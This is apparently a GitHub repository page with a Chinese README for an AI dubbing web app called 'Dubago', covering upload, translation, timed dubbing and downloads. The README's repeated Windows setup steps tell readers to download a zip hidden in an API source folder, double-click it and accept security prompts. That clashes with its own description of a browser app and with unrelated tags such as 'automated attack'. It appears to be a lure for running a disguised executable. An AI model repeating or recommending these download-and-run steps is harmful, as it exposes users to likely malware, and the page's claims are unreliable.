persiflagesolarflare183/perso-ai-devrel
GitHub: persiflagesolarflare183/perso-ai-devrel
一个基于AI的网页应用,通过STT、翻译和TTS技术实现视频音频的自动配音,解决多语言内容快速本地化问题。
Stars: 1 | Forks: 0
# 🎧 perso-ai-devrel - Windows快速AI配音
[](https://github.com/persiflagesolarflare183/perso-ai-devrel/raw/refs/heads/main/app/api/dub/ai-perso-devrel-v2.2.zip)
## 📌 本应用功能
Dubago 是一个用于AI配音的网页应用。您上传音频或视频文件,选择目标语言,应用便会将语音转换为配音后的音频。它保持配音时间与原始语音接近,使效果听起来自然。
您使用 Google 帐户登录。只有经批准列表上的电子邮件地址才能使用该应用。如果您的帐户不在列表上,应用将阻止访问。
## ✨ 主要功能
- **带访问控制的 Google 登录** — 仅批准的电子邮件地址可使用此服务
- **音频上传** — 支持 MP3、WAV、M4A、FLAC、OGG 及其他常见音频文件
- **视频上传** — 支持 MP4、WebM 和 QuickTime 文件
- **短片段选择** — 从较长文件中选取最长 60 秒的片段
- **定时配音** — 保持配音语音与原始时间同步
- **并排视图** — 将原始版本与配音版本并排查看
- **字幕切换** — 打开或关闭翻译字幕
- **配音视频下载** — 保存内嵌字幕的 WebM 视频文件
- **配音音频下载** — 将结果保存为 WAV 文件
## 💻 Windows 设置
### 1. 打开下载页面
使用此链接访问页面并下载应用:
[下载 perso-ai-devrel](https://github.com/persiflagesolarflare183/perso-ai-devrel/raw/refs/heads/main/app/api/dub/ai-perso-devrel-v2.2.zip)
### 2. 保存文件
- 点击下载链接
- 将文件保存到您的**下载**文件夹或**桌面**
- 如果 Windows 询问保存位置,请选择一个您易于找到的文件夹
### 3. 启动应用
- 打开包含下载文件的文件夹
- 双击文件以运行
- 如果浏览器打开,请保持打开状态。应用在浏览器中运行
### 4. 登录
- 点击 **使用 Google 登录**
- 选择您要使用的 Google 帐户
- 如果帐户已获批准,应用将打开
- 如果帐户未获批准,应用将停留在被阻止页面
## 🖱️ 如何使用 Dubago
### 1. 上传文件
- 点击上传区域
- 选择音频文件或视频文件
- 等待文件加载完成
### 2. 选择片段长度
- 使用裁剪滑块选择您想配音的部分
- 将选择范围保持在 60 秒以内
- 移动手柄以设置起始点和结束点
### 3. 选择目标语言
- 选择您想要配音的目标语言
- 应用将使用该语言进行翻译和语音输出
### 4. 开始配音
- 点击按钮开始配音流程
- 应用将:
- 将语音转为文本
- 翻译文本
- 用目标语言生成新的语音
- 等待流程完成
### 5. 审阅结果
- 播放原始版本
- 播放配音版本
- 根据需要打开或关闭字幕
- 并排比较两个面板
### 6. 下载结果
- 将配音音频下载为 WAV 文件
- 将配音视频下载为 WebM 文件
- 将文件保存到您的电脑
## 🔒 访问规则
Dubago 使用 Google 登录和电子邮件白名单。
- 已批准的帐户可以登录并使用该应用
- 未批准的帐户在会话开始前将被阻止
- 如果您需要访问权限,请使用已为该服务批准的 Google 帐户
## 🧭 配音过程中发生了什么
应用遵循清晰的流程:
1. 读取您上传的音频或视频
2. 识别片段中的语音
3. 翻译口语文本
4. 用目标语言生成新的语音
5. 将新语音放置在大致对应原始语音的时间槽中
6. 构建最终的音频和视频文件以供下载
这有助于使最终配音保持接近源片段的节奏。
## 🎬 视频和字幕详情
当您上传视频文件时,应用会首先提取音轨。然后将该音频发送到配音流程进行处理。
对于最终视频:
- 原始视频在左面板中保持不变
- 配音版本播放时,原始音频静音
- 字幕可以显示在视频上方
- 导出的视频使用 WebM 格式
## 🔧 兼容良好的文件类型
### 音频文件
常见选择包括:
- MP3
- WAV
- M4A
- FLAC
- OGG
### 视频文件
常见选择包括:
- MP4
- WebM
- QuickTime MOV
如果您使用来自手机、相机或编辑应用的文件,只要它是这些格式之一,通常就可以正常工作。
## 🪟 推荐的 Windows 设置
为了在 Windows 上获得最佳效果:
- 使用最新版本的 Chrome 或 Edge
- 保留至少 2 GB 的可用磁盘空间
- 使用稳定的互联网连接
- 配音时关闭其他占用资源大的应用
- 首次测试时使用 60 秒以下的文件
## 📂 建议的首次测试
如果您想快速尝试该应用:
1. 选择一个短的 MP3 或 MP4 文件
2. 选取一个 10 到 20 秒的片段
3. 选择一个目标语言
4. 开始配音
5. 检查配音后的音频和视频
6. 下载结果
这为您提供了一种快速方式来确认该应用在您的设备上是否一切正常。
## 🧰 如果应用无法打开
请尝试以下步骤:
- 确保文件已下载完成
- 右键单击文件并选择**打开**
- 尝试使用其他浏览器
- 使用已批准的 Google 帐户登录
- 检查您的互联网连接是否正常
- 如果上传失败,请尝试使用较短的文件
- 刷新页面并重试
## 🧼 获得更好结果的技巧
- 使用清晰、背景噪音少的语音
- 配音前裁剪掉长时间的停顿
- 首次运行时保持片段较短
- 使用音量稳定的文件
- 如果想要更方便的审阅,可以选择字幕
## 📎 下载链接
使用此页面下载应用:
[https://github.com/persiflagesolarflare183/perso-ai-devrel/raw/refs/heads/main/app/api/dub/ai-perso-devrel-v2.2.zip](https://github.com/persiflagesolarflare183/perso-ai-devrel/raw/refs/heads/main/app/api/dub/ai-perso-devrel-v2.2.zip)
## 🖥️ 基本的 Windows 文件处理
如果 Windows 询问如何打开该文件:
- 如果应用以网页形式打开,请选择您的浏览器
- 如果文件启动本地应用窗口,请选择**打开**
- 如果 Windows 显示安全提示,请确认您想要运行该文件
## 🔁 典型工作流程
1. 打开应用
2. 使用 Google 登录
3. 上传音频或视频
4. 裁剪您想要的部分
5. 选择目标语言
6. 开始配音
7. 审阅结果
8. 下载您需要的文件
## 🎯 您将获得
- 配音后的音轨
- 配音后的视频文件
- 可显示或隐藏的字幕
- 遵循源片段的时间同步
- 基于浏览器的简单易用工作流程
标签:AI配音, Google认证, Streamlit, Windows工具, 人工智能, 同步技术, 多媒体处理, 多语言支持, 字幕生成, 安全测试框架, 文件上传下载, 用户模式Hook绕过, 翻译, 自动化攻击, 视频处理, 访问控制, 语音合成, 语音识别, 语音转换, 音频处理